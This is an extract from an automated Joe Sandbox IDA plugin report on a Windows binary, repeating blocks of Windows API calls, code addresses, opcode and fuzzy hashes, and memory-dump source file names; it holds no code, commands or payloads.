    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CreateDirectory$ErrorLast_wcslen
    • String ID:
    • API String ID: 2260680371-0
    • Opcode ID: 4680775df1d933126a2da7be6710bee6bca596b6b7415130beef38b2b79bca46
    • Instruction ID: 563a8774125e4bc5143846a901f138542d260ce61be0e9303490f8cce08c48f3
    • Opcode Fuzzy Hash: 4680775df1d933126a2da7be6710bee6bca596b6b7415130beef38b2b79bca46
    • Instruction Fuzzy Hash: 3B01D8312046646BEF716F719C45FFE33889F05780F040425F901E6182DBA4DA4187A6
    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 000DCA68
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Info
    • String ID:
    • API String ID: 1807457897-3916222277
    • Opcode ID: e5234eac87de6aaafd4cee754d10bd09214358b1e0e1261a73d728c0df94445f
    • Instruction ID: 520d7b81022c5f35ea6883b91e90ce3186ef5fe36db6cc31c26aeb8eed2732b0
    • Opcode Fuzzy Hash: e5234eac87de6aaafd4cee754d10bd09214358b1e0e1261a73d728c0df94445f
    • Instruction Fuzzy Hash: 0441077050434D9EEB218A688C85EFABBEADB05318F1404EFE58A86242D235AE45CF70
    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 000DBEA8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: S
    • API String ID: 190572456-186050230
    • Opcode ID: df557e00ac5de4b520f3cdec850e8b4202721814c5e5d8ee78e688f3fd7a9c07
    • Instruction ID: 0e234f002a72c202e7e56d07918c8e0b9f5f2948c9aaa02d83d6467cbe9f4d60
    • Opcode Fuzzy Hash: df557e00ac5de4b520f3cdec850e8b4202721814c5e5d8ee78e688f3fd7a9c07
    • Instruction Fuzzy Hash: 2011E733A00324DF9B619E29EC404EE73E59B847607174222FE14AB355DB34EC41DAE0
    APIs
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 000DC18D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: String
    • String ID: LCMapStringEx
    • API String ID: 2568140703-3893581201
    • Opcode ID: c2c34bf9494e9c461746cca0126107488e9ab0898e386835d911e6268df6c2e4
    • Instruction ID: 83250b1913f01cfeb54b7216b8794f131e9fd01c3b2f45d45d5f93fbce52c404
    • Opcode Fuzzy Hash: c2c34bf9494e9c461746cca0126107488e9ab0898e386835d911e6268df6c2e4
    • Instruction Fuzzy Hash: 41012532500259BBEF12AF91DC01DEE7FA2EF08710F454116FF082A261CB368971EB91
    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,000DB71F), ref: 000DC105
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CountCriticalInitializeSectionSpin
    • String ID: InitializeCriticalSectionEx
    • API String ID: 2593887523-3084827643
    • Opcode ID: 1e542e70afc11386c7dd9bc6bcb78817a8dadd33c64403545cd30e7c2c9abfac
    • Instruction ID: 2773a84ab019440e8f979c8a75b24f5e955f28fd7a4309875b80cc555a8c56ef
    • Opcode Fuzzy Hash: 1e542e70afc11386c7dd9bc6bcb78817a8dadd33c64403545cd30e7c2c9abfac
    • Instruction Fuzzy Hash: DCF0B431A41218BBEF21AF51CC05DAD7FA1DF18B50F404067FE093A261CE315950EB91
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Alloc
    • String ID: FlsAlloc
    • API String ID: 2773662609-671089009
    • Opcode ID: de95536d7269c7a08d5bfcc7bc07957f186ea2abf53fcc2deaca0b17e58b06ba
    • Instruction ID: 15cec53a3e191995de1e0e8c026c88b8cf38f219d088422c8a16cf9836540895
    • Opcode Fuzzy Hash: de95536d7269c7a08d5bfcc7bc07957f186ea2abf53fcc2deaca0b17e58b06ba
    • Instruction Fuzzy Hash: BBE0EC31F40318AFD6116B519C0697EBB95CF04B10F460157F9097B391CF755D019ADA
    APIs
      • Part of subcall function 000DC96B: GetOEMCP.KERNEL32(00000000,?,?,000DCBF4,?), ref: 000DC996
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,000DCC39,?,00000000), ref: 000DCE14
    • GetCPInfo.KERNEL32(00000000,000DCC39,?,?,?,000DCC39,?,00000000), ref: 000DCE27
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CodeInfoPageValid
    • String ID:
    • API String ID: 546120528-0
    • Opcode ID: 8a2ecd3aea2490a990bd45950b4c61931c02a380e5637d00919b8cc7125506d4
    • Instruction ID: 97bab59eae80795ccd3a0ad95f0d046b9163c654d45d4b0cf671d33b21453db3
    • Opcode Fuzzy Hash: 8a2ecd3aea2490a990bd45950b4c61931c02a380e5637d00919b8cc7125506d4
    • Instruction Fuzzy Hash: C451F0B19043079EFB218F75C885EFABBE6AF41300F14406FD0968A752E6399942DBA0
    APIs
    • SetFilePointer.KERNEL32(000000FF,?,?,?,-000018C0,00000000,00000800,?,000BACB0,?,?,00000000,?,?,000B9C8B,?), ref: 000BAE3A
    • GetLastError.KERNEL32(?,?,000B9C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 000BAE49
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 9ae8f6f8fc0e769d8941d9ddf4f3db031ac0a29f7e6a3047e2a48e0db885e131
    • Instruction ID: dc5ea3ba2a5547da954f9ec2553b3093c766172491100115bafa55060faf962b
    • Opcode Fuzzy Hash: 9ae8f6f8fc0e769d8941d9ddf4f3db031ac0a29f7e6a3047e2a48e0db885e131
    • Instruction Fuzzy Hash: 254101347043458BDB34AF24C888AEE73E5FB5A322F10062EE89787A51D775DC858B53
    APIs
    • ShowWindow.USER32(00000000,00000005,?,?,?,?,000CA7F6,00000000,?), ref: 000CA699
    • SetWindowTextW.USER32(00000000,00000000), ref: 000CA6A3
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Window$ShowText
    • String ID:
    • API String ID: 1551406749-0
    • Opcode ID: dc4491d2ac72366d24330c74384f3919a0bc5d14ae3d3127441e147668284da2
    • Instruction ID: ecc0fe5346886d7485a088903c9d3e9e8f4f02243ec471a47a328d3fefcb0cc7
    • Opcode Fuzzy Hash: dc4491d2ac72366d24330c74384f3919a0bc5d14ae3d3127441e147668284da2
    • Instruction Fuzzy Hash: 45314B3170071AAFD714DF64EC88E1EBBE9BF49704B09051EF6459B260DB71AC41CBA6
    APIs
      • Part of subcall function 000DA505: GetLastError.KERNEL32(?,000F30C4,000D5972,000F30C4,?,?,000D53ED,?,?,000F30C4), ref: 000DA509
      • Part of subcall function 000DA505: _free.LIBCMT ref: 000DA53C
      • Part of subcall function 000DA505: SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA57D
      • Part of subcall function 000DA505: _abort.LIBCMT ref: 000DA583
      • Part of subcall function 000DCCFE: _abort.LIBCMT ref: 000DCD30
      • Part of subcall function 000DCCFE: _free.LIBCMT ref: 000DCD64
      • Part of subcall function 000DC96B: GetOEMCP.KERNEL32(00000000,?,?,000DCBF4,?), ref: 000DC996
    • _free.LIBCMT ref: 000DCC4F
    • _free.LIBCMT ref: 000DCC85
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorLast_abort
    • String ID:
    • API String ID: 2991157371-0
    • Opcode ID: 7a180ac5d152a4966fc5d9eed213d61f40e2dbd97f9e08bb06836c2757b6849b
    • Instruction ID: c73a0e8c76c84a5b5b8b8ca8875558e7ac424faaa93df24c1c9a07853cca1f0a
    • Opcode Fuzzy Hash: 7a180ac5d152a4966fc5d9eed213d61f40e2dbd97f9e08bb06836c2757b6849b
    • Instruction Fuzzy Hash: 5631B33191430AAFEB14DB68D840EA9B7E5AF41320F25409BE5089B392EB369D40DB60
    APIs
    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000B7ED0,?,?,?,00000000), ref: 000BB04C
    • SetFileTime.KERNEL32(?,?,?,?), ref: 000BB100
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$BuffersFlushTime
    • String ID:
    • API String ID: 1392018926-0
    • Opcode ID: 1a4ce533ec2cc1717335771268fb66d94e7f1bfa37c8f74b6483b77354ec1ef9
    • Instruction ID: 7c392a3f6631ed22f785a989f51e0a04132fe59fe667877717d4c795abdb6279
    • Opcode Fuzzy Hash: 1a4ce533ec2cc1717335771268fb66d94e7f1bfa37c8f74b6483b77354ec1ef9
    • Instruction Fuzzy Hash: C121F031269241DBC724EF64C891AFBBBE4AF91304F04491CB4E183141D7A9E90C9B62
    APIs
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,000BB1B7,?,?,000B81FD), ref: 000BA946
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,000BB1B7,?,?,000B81FD), ref: 000BA976
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 1a0330b377e1dc9f20d40dd131323e844f1508d0aab4ceffc2e008adfaa65e04
    • Instruction ID: 8f16f03ade6bb0a4fc7834cd15ee7230cff46e5edbbabb0340ff43529c313063
    • Opcode Fuzzy Hash: 1a0330b377e1dc9f20d40dd131323e844f1508d0aab4ceffc2e008adfaa65e04
    • Instruction Fuzzy Hash: C921D071604344AEE3708A25CC88FF776DCEB4A321F010A2DF9D5C21D2C778A8859672
    APIs
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 000BB157
    • GetLastError.KERNEL32 ref: 000BB164
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 89d8c33f4eee953684bcc3f3fbe27dc6d980a451235368cee7cc5ab91b294767
    • Instruction ID: c4d5b7464274cba79b33d229587384f588c3d9e95f4eed50494642f487886e1d
    • Opcode Fuzzy Hash: 89d8c33f4eee953684bcc3f3fbe27dc6d980a451235368cee7cc5ab91b294767
    • Instruction Fuzzy Hash: 3A11E131600700ABE735CA2CCC64BEAB3E9BB44370FA04B29E192935D0EBB4ED05C760
    APIs
    • _free.LIBCMT ref: 000DA6B5
      • Part of subcall function 000DA7EE: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,000F30C4,000B187A,?,?,00000007,?,?,?,000B13F2,?,00000000), ref: 000DA6F1
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Heap$AllocAllocate_free
    • String ID:
    • API String ID: 2447670028-0
    • Opcode ID: 7abb679aed427eb418e10d604bab4bbb8807188ca3ecef5764fb9279e3b28c98
    • Instruction ID: 91893600306f83bc5061c2c20a12c34064911405b78c7a1a7428943cae472b8f
    • Opcode Fuzzy Hash: 7abb679aed427eb418e10d604bab4bbb8807188ca3ecef5764fb9279e3b28c98
    • Instruction Fuzzy Hash: DEF06232301315E6DB613A26AC45AAB3B989F83BB1B1D4027F855AA3A2DB30DC009577
    APIs
    • GetCurrentProcess.KERNEL32(?,?), ref: 000C23C3
    • GetProcessAffinityMask.KERNEL32(00000000), ref: 000C23CA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Process$AffinityCurrentMask
    • String ID:
    • API String ID: 1231390398-0
    • Opcode ID: c80862ff5e3d2e50a22a99e64c64c3f81efcbf50ce60d98080ab35579212fd3b
    • Instruction ID: 453055281300e627fd8ebd50aaf83009b7d6484ddcd6bef0d88abef749fcf4fe
    • Opcode Fuzzy Hash: c80862ff5e3d2e50a22a99e64c64c3f81efcbf50ce60d98080ab35579212fd3b
    • Instruction Fuzzy Hash: 8FE09A32B10186A7DF098BA8AC89EAF72ECEB542047248179A603E3900E97CDE0546A0
    APIs
    • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB8FA
      • Part of subcall function 000BCF32: _wcslen.LIBCMT ref: 000BCF56
    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB92B
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AttributesFile$_wcslen
    • String ID:
    • API String ID: 2673547680-0
    • Opcode ID: d36f6169eda9411548890dfef87fb6046ee55d46f35cdf5c68cf03c014256a08
    • Instruction ID: 126b383acc425e03405d6b1de52f2297de90c1acb01b9a1b5d1674f236ec1025
    • Opcode Fuzzy Hash: d36f6169eda9411548890dfef87fb6046ee55d46f35cdf5c68cf03c014256a08
    • Instruction Fuzzy Hash: D0F0A93110424ABBEF615FA0CC40BEA37ADBF047C5F008065BA44EA1A1DB75DD959A20
    APIs
    • DeleteFileW.KERNEL32(?,00000000,?,000BA438,?,?,?,?,000B892B,?,?,?,000E37FF,000000FF), ref: 000BB481
      • Part of subcall function 000BCF32: _wcslen.LIBCMT ref: 000BCF56
    • DeleteFileW.KERNEL32(?,?,?,00000800,?,000BA438,?,?,?,?,000B892B,?,?,?,000E37FF,000000FF), ref: 000BB4AF
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: DeleteFile$_wcslen
    • String ID:
    • API String ID: 2643169976-0
    • Opcode ID: f481c9571abecb63c84e889b41a644397eb39ee648311bfdfccfab2eed92338a
    • Instruction ID: 61abd4baf3d9f57e56cc7435792c998fa78a5b6ccfddcbcfa25f021c854f87dc
    • Opcode Fuzzy Hash: f481c9571abecb63c84e889b41a644397eb39ee648311bfdfccfab2eed92338a
    • Instruction Fuzzy Hash: 52E022325002496BEB109BA0CC44FEA339DBF04782F044035BA04D60A2DBB4DC88DA14
    APIs
    • GdiplusShutdown.GDIPLUS(?,?,?,?,000E37FF,000000FF), ref: 000CBDA5
    • CoUninitialize.COMBASE(?,?,?,?,000E37FF,000000FF), ref: 000CBDAA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: GdiplusShutdownUninitialize
    • String ID:
    • API String ID: 3856339756-0
    • Opcode ID: aed8c09e2bb2d36d49e0413cc8a303d74829a99d7604176badb5978c9ae52077
